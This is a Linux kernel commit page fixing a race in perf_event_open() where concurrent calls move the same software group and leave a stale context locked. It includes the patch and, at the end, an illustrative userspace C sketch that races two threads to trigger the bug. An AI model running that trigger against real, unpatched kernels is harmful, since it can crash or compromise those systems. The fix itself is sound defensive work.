author		Peter Zijlstra <peterz@infradead.org>	2017-01-11 15:09:50 -0500
committer	Ingo Molnar <mingo@kernel.org>	2017-01-14 04:56:11 -0500
commit		321027c1fe77f892f4ea07846aeae08cefbbb290 (patch)
tree		e90493b64144be2e6e9564dca1afe870d393765c /kernel/events
parent		63cae12bce9861cec309798d34701cf3da20bc71 (diff)
perf/core: Fix concurrent sys_perf_event_open() vs. 'move_group' race
Di Shen reported a race between two concurrent sys_perf_event_open()
calls where both try and move the same pre-existing software group
into a hardware context.
The problem is exactly that described in commit:
f63a8daa5812 ("perf: Fix event->ctx locking")
... where, while we wait for a ctx->mutex acquisition, the event->ctx
relation can have changed under us.
That very same commit failed to recognise sys_perf_event_open() as an
external access vector to the events and thereby didn't apply the
established locking rules correctly.
So while one sys_perf_event_open() call is stuck waiting on
mutex_lock_double(), the other (which owns said locks) moves the group
about. By the time the former sys_perf_event_open() acquires the
locks, the context it has acquired is stale (and possibly dead).
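Concretely, the interleaving looks roughly like this (an illustrative
reconstruction, not taken from the original report):

	sys_perf_event_open() #1		sys_perf_event_open() #2

	gctx = group_leader->ctx;
	mutex_lock_double(&gctx->mutex,
			  &ctx->mutex);		// owns both mutexes;
	  ... blocks ...			// moves group_leader into
						// the hardware context
						// releases both mutexes
	// resumes owning both mutexes, but
	// group_leader->ctx != gctx anymore:
	// the locked gctx is stale (possibly dead)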
Apply the established locking rules as per perf_event_ctx_lock_nested()
to the mutex_lock_double() for the 'move_group' case. This obviously means
we need to validate state after we acquire the locks.
Reported-by: Di Shen (Keen Lab)
Tested-by: John Dias <joaodias@google.com>
Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Cc: Alexander Shishkin <alexander.shishkin@linux.intel.com>
Cc: Arnaldo Carvalho de Melo <acme@kernel.org>
Cc: Arnaldo Carvalho de Melo <acme@redhat.com>
Cc: Jiri Olsa <jolsa@redhat.com>
Cc: Kees Cook <keescook@chromium.org>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Min Chong <mchong@google.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Stephane Eranian <eranian@google.com>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: Vince Weaver <vincent.weaver@maine.edu>
Fixes: f63a8daa5812 ("perf: Fix event->ctx locking")
Link: http://lkml.kernel.org/r/20170106131444.GZ3174@twins.programming.kicks-ass.net
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Diffstat (limited to 'kernel/events')
-rw-r--r--	kernel/events/core.c	58
1 file changed, 54 insertions(+), 4 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 72ce7d63e561..cbc5937265da 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -9529,6 +9529,37 @@ static int perf_event_set_clock(struct perf_event *event, clockid_t clk_id)
 	return 0;
 }
 
+/*
+ * Variation on perf_event_ctx_lock_nested(), except we take two context
+ * mutexes.
+ */
+static struct perf_event_context *
+__perf_event_ctx_lock_double(struct perf_event *group_leader,
+			     struct perf_event_context *ctx)
+{
+	struct perf_event_context *gctx;
+
+again:
+	rcu_read_lock();
+	gctx = READ_ONCE(group_leader->ctx);
+	if (!atomic_inc_not_zero(&gctx->refcount)) {
+		rcu_read_unlock();
+		goto again;
+	}
+	rcu_read_unlock();
+
+	mutex_lock_double(&gctx->mutex, &ctx->mutex);
+
+	if (group_leader->ctx != gctx) {
+		mutex_unlock(&ctx->mutex);
+		mutex_unlock(&gctx->mutex);
+		put_ctx(gctx);
+		goto again;
+	}
+
+	return gctx;
+}
+
 /**
  * sys_perf_event_open - open a performance event, associate it to a task/cpu
  *
@@ -9772,12 +9803,31 @@ SYSCALL_DEFINE5(perf_event_open,
 	}
 
 	if (move_group) {
-		gctx = group_leader->ctx;
-		mutex_lock_double(&gctx->mutex, &ctx->mutex);
+		gctx = __perf_event_ctx_lock_double(group_leader, ctx);
+
 		if (gctx->task == TASK_TOMBSTONE) {
 			err = -ESRCH;
 			goto err_locked;
 		}
+
+		/*
+		 * Check if we raced against another sys_perf_event_open() call
+		 * moving the software group underneath us.
+		 */
+		if (!(group_leader->group_caps & PERF_EV_CAP_SOFTWARE)) {
+			/*
+			 * If someone moved the group out from under us, check
+			 * if this new event wound up on the same ctx, if so
+			 * its the regular !move_group case, otherwise fail.
+			 */
+			if (gctx != ctx) {
+				err = -EINVAL;
+				goto err_locked;
+			} else {
+				perf_event_ctx_unlock(group_leader, gctx);
+				move_group = 0;
+			}
+		}
 	} else {
 		mutex_lock(&ctx->mutex);
 	}
@@ -9879,7 +9929,7 @@ SYSCALL_DEFINE5(perf_event_open,
 	perf_unpin_context(ctx);
 
 	if (move_group)
-		mutex_unlock(&gctx->mutex);
+		perf_event_ctx_unlock(group_leader, gctx);
 	mutex_unlock(&ctx->mutex);
 
 	if (task) {
@@ -9905,7 +9955,7 @@ SYSCALL_DEFINE5(perf_event_open,
 
 err_locked:
 	if (move_group)
-		mutex_unlock(&gctx->mutex);
+		perf_event_ctx_unlock(group_leader, gctx);
 	mutex_unlock(&ctx->mutex);
 /* err_file: */
 	fput(event_file);
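For context, a userspace trigger for this race has roughly the following
shape. This is a minimal illustrative sketch, not Di Shen's actual
reproducer: it assumes sufficient permission to open the events (see
/proc/sys/kernel/perf_event_paranoid), and a real reproducer would retry
the two opens in a tight loop to widen the race window.

/*
 * Illustrative sketch only: two threads race to move the same software
 * group into a hardware context via perf_event_open()'s group_fd.
 */
#include <linux/perf_event.h>
#include <sys/syscall.h>
#include <pthread.h>
#include <unistd.h>

static int group_fd;	/* leader of a pre-existing software group */
static pid_t target;	/* thread the events are attached to */

static long sys_perf_open(struct perf_event_attr *attr, pid_t pid, int cpu,
			  int group, unsigned long flags)
{
	return syscall(__NR_perf_event_open, attr, pid, cpu, group, flags);
}

static void *racer(void *arg)
{
	struct perf_event_attr hw = {
		.size	= sizeof(hw),
		.type	= PERF_TYPE_HARDWARE,	/* hardware event ... */
		.config	= PERF_COUNT_HW_CPU_CYCLES,
	};

	/* ... grouped under the software leader: takes the move_group path */
	sys_perf_open(&hw, target, -1, group_fd, 0);
	return NULL;
}

int main(void)
{
	struct perf_event_attr sw = {
		.size	= sizeof(sw),
		.type	= PERF_TYPE_SOFTWARE,	/* software group leader */
		.config	= PERF_COUNT_SW_CPU_CLOCK,
	};
	pthread_t t1, t2;

	target = syscall(SYS_gettid);
	group_fd = sys_perf_open(&sw, target, -1, -1, 0);
	if (group_fd < 0)
		return 1;

	/* Both opens race to move the same group into a hardware context. */
	pthread_create(&t1, NULL, racer, NULL);
	pthread_create(&t2, NULL, racer, NULL);
	pthread_join(t1, NULL);
	pthread_join(t2, NULL);
	return 0;
}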